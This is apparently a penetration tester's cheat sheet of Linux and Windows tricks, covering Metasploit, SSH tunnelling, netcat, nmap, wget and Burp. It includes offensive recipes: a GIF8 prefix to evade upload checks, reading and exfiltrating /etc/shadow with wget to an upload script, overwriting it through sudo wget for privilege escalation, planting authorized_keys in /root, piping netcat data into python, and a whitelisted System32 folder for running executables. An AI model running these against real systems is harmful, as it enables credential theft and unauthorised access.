Tricks

General

  • Put GIF8; at the top of a payload so that file-type checks identify it as a GIF image (GIF8 is the start of the GIF magic number).

Linux

Metasploit

Import an nmap XML result into the Metasploit database.

nmap -Pn -sS -A -oX Subnet1.xml 192.168.1.0/24

msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import Subnet1.xml
msf > db_hosts -c address
Hosts
=====
address
-------
192.168.1.1
192.168.1.10
192.168.1.101
192.168.1.102
192.168.1.109
192.168.1.116
192.168.1.142
192.168.1.152
192.168.1.154
192.168.1.171
192.168.1.155
192.168.1.174
192.168.1.180
192.168.1.181
192.168.1.2
192.168.1.99
msf >

Port Forwarding

Inside an established ssh session, press Enter and then type

~C

to open the SSH command line (the escape character is only recognised at the start of a line). Then add a local forward:

-L 9905:127.0.0.1:6666

To cancel it, open the command line again and remove the forward:

~C

-KL 9905


Sed

# replace every <text> with a tab (\t in the replacement is a GNU sed extension; BSD sed needs a literal tab)
sed 's/<text>/\t/g'

Less

# disable word wrap
less -S

SSH

If you get a "no matching key exchange method found" error from an old server, re-enable the legacy algorithm for that one connection:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 user@host

SSH Tunnel

# forward local port 9000 to remote-ip:port via tun-remote-ip, e.g. when remote-ip blocks your own address but accepts tun-remote-ip
ssh -i key -L9000:remote-ip:port tun-remote-ip

# or, run all traffic through a SOCKS proxy on localhost:1080
ssh -D1080 remote-ip-you-have-access

# listen on local ports and forward their traffic to remote ports through ssh:
# local 9001 and 9002 go to the remote host's 127.0.0.1 ports 5801 and 5901
ssh -L9001:127.0.0.1:5801 -L9002:127.0.0.1:5901 user@host

Bash

Bash can slice a variable like a Python string with ${var:offset:length} (a bash feature, available on Linux by default, but not in the BSD /bin/sh).

x=abc
echo $x        # abc
echo ${x:1:1}  # b

In bash, printf '\x41' prints 'A', but the BSD printf prints 'x41'; only octal escapes such as printf '\101' are portable.

NetCat

# serve a file: listen on a port and the file is sent to whoever connects
# (traditional netcat syntax; OpenBSD nc takes "nc -l port" without -p)
nc -l -p port < file

# other side: connect and pipe the data into whatever program, e.g. python
nc ip port | python

Nmap

Render an nmap XML result as a Bootstrap-styled web page with this stylesheet:

https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl

nmap ... --stylesheet <path-to-xsl> -oX result.xml
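Added example (not from the original notes) for the two nmap XML items above, the Metasploit import and the stylesheet: the same host list that db_hosts -c address prints, pulled straight out of the XML with sed/awk, plus a function that inserts the xml-stylesheet instruction into a scan that was saved without --stylesheet. SAMPLE_XML is a constructed two-host file in nmap's schema, and the function names are mine.

```shell
#!/bin/sh
# Added example, not from the original notes: work on an `nmap -oX` file
# directly with sed/awk, without importing it into the Metasploit database,
# and add the stylesheet processing instruction after the fact.
# SAMPLE_XML is a constructed two-host file in nmap's XML schema.

SAMPLE_XML='<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -Pn -sS -oX Subnet1.xml 192.168.1.0/24">
<host><status state="up"/>
<address addr="192.168.1.1" addrtype="ipv4"/>
<address addr="AA:BB:CC:DD:EE:FF" addrtype="mac"/>
<ports><port protocol="tcp" portid="22"><state state="open"/></port></ports>
</host>
<host><status state="up"/>
<address addr="192.168.1.10" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="80"><state state="open"/></port>
<port protocol="tcp" portid="443"><state state="open"/></port>
<port protocol="tcp" portid="23"><state state="closed"/></port></ports>
</host>
</nmaprun>'

# nmap_hosts XML: one IPv4 address per line, the same list `db_hosts -c address`
# prints. Only addrtype="ipv4" is kept, so MAC addresses never end up in it.
nmap_hosts() {
  printf '%s\n' "$1" |
    sed -n 's/.*<address addr="\([^"]*\)" addrtype="ipv4".*/\1/p'
}

# nmap_open_ports XML: "address port/proto" for every port in state "open".
# The current host's address is remembered from the <address> line that
# precedes its <ports> block; one line may carry several <port> elements.
nmap_open_ports() {
  printf '%s\n' "$1" | awk '
    /<address addr=/ && /addrtype="ipv4"/ {
      match($0, /addr="[^"]*"/)
      host = substr($0, RSTART + 6, RLENGTH - 7)
    }
    /<port protocol=/ {
      line = $0
      while (match(line, /<port protocol="[^"]*" portid="[0-9]*"><state state="open"/)) {
        seg  = substr(line, RSTART, RLENGTH)
        rest = substr(line, RSTART + RLENGTH)
        match(seg, /protocol="[^"]*"/); proto = substr(seg, RSTART + 10, RLENGTH - 11)
        match(seg, /portid="[0-9]*"/);  port  = substr(seg, RSTART + 8,  RLENGTH - 9)
        print host, port "/" proto
        line = rest
      }
    }'
}

# add_stylesheet XML XSL: insert the <?xml-stylesheet?> processing instruction
# that `nmap --stylesheet` writes at scan time, for a scan saved without it.
# The instruction goes right after the XML declaration on line 1.
add_stylesheet() {
  printf '%s\n' "$1" |
    sed "1a\\
<?xml-stylesheet href=\"$2\" type=\"text/xsl\"?>"
}

# Usage: the host list the msf console showed, the open ports, and the XML
# with a stylesheet attached (save it next to a local copy of the XSL).
nmap_hosts "$SAMPLE_XML"
nmap_open_ports "$SAMPLE_XML"
add_stylesheet "$SAMPLE_XML" nmap-bootstrap.xsl > /dev/null
```

Browsers generally refuse to apply a cross-origin XSL to a local XML file, so keep the XSL next to the XML (a relative href, as above) or render it once with xsltproc -o scan.html nmap-bootstrap.xsl scan.xml.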

Wget

# -i reads the file as a URL list, so it can read any file wget has permission to open
wget -i /etc/shadow

# upload a file (quote the URL so the shell does not expand the ?)
wget --post-file=FILE 'http://<host>:<port>/upload.php?filename=<FILE-NAME>'

# create a .ssh folder locally, generate a key pair, mv id_rsa.pub to authorized_keys,
# then use wget to mirror the folder onto the target
wget -P /root/ -nH -m http://<ip>:<port>/

PHP File Upload Script and Web Server

If you have a user shell that can read /etc/shadow, upload the file to your local machine, change the hash to one you want, and download it back, using the wget commands above. When the user may run wget with sudo, upload /etc/shadow with wget and re-download it to /etc/shadow to overwrite the original content.

# php upload file script (upload.php)
<?php
// basename() strips any directory part, so the filename parameter cannot escape upload/
$fname = basename($_REQUEST['filename']);
// the request body (what wget --post-file sends) is written under the given name
file_put_contents('upload/' . $fname, file_get_contents('php://input'));
?>

# make the folder writable but not readable, so nobody else can list what was uploaded
# (the execute bit is needed as well: files cannot be created in a directory without it)
mkdir upload; chmod 333 upload

# start the php web server
php -S <ip>:<port> -t .

Tcpdump

To check whether a server we own is reachable from the target, run the command below on our server and ping it from the target; if the ping gets through, the ICMP echo request shows up in tcpdump.

tcpdump -nnvXSs 0 -c2 icmp

Windows

# System32 is whitelisted by the system; this subfolder is writable, so an .exe placed here is not intercepted
C:\Windows\System32\spool\drivers\color

Burp Suite

In Proxy -> Options -> Match and Replace, you can add request headers that are applied to every request.

Open Source Web App

Download the open-source web app's source. Search it for the version string and collect the files that contain it:

grep -Rl '<version>' .

Then request those file names from the server in the browser and see what it responds with. This may turn up file inclusion as well.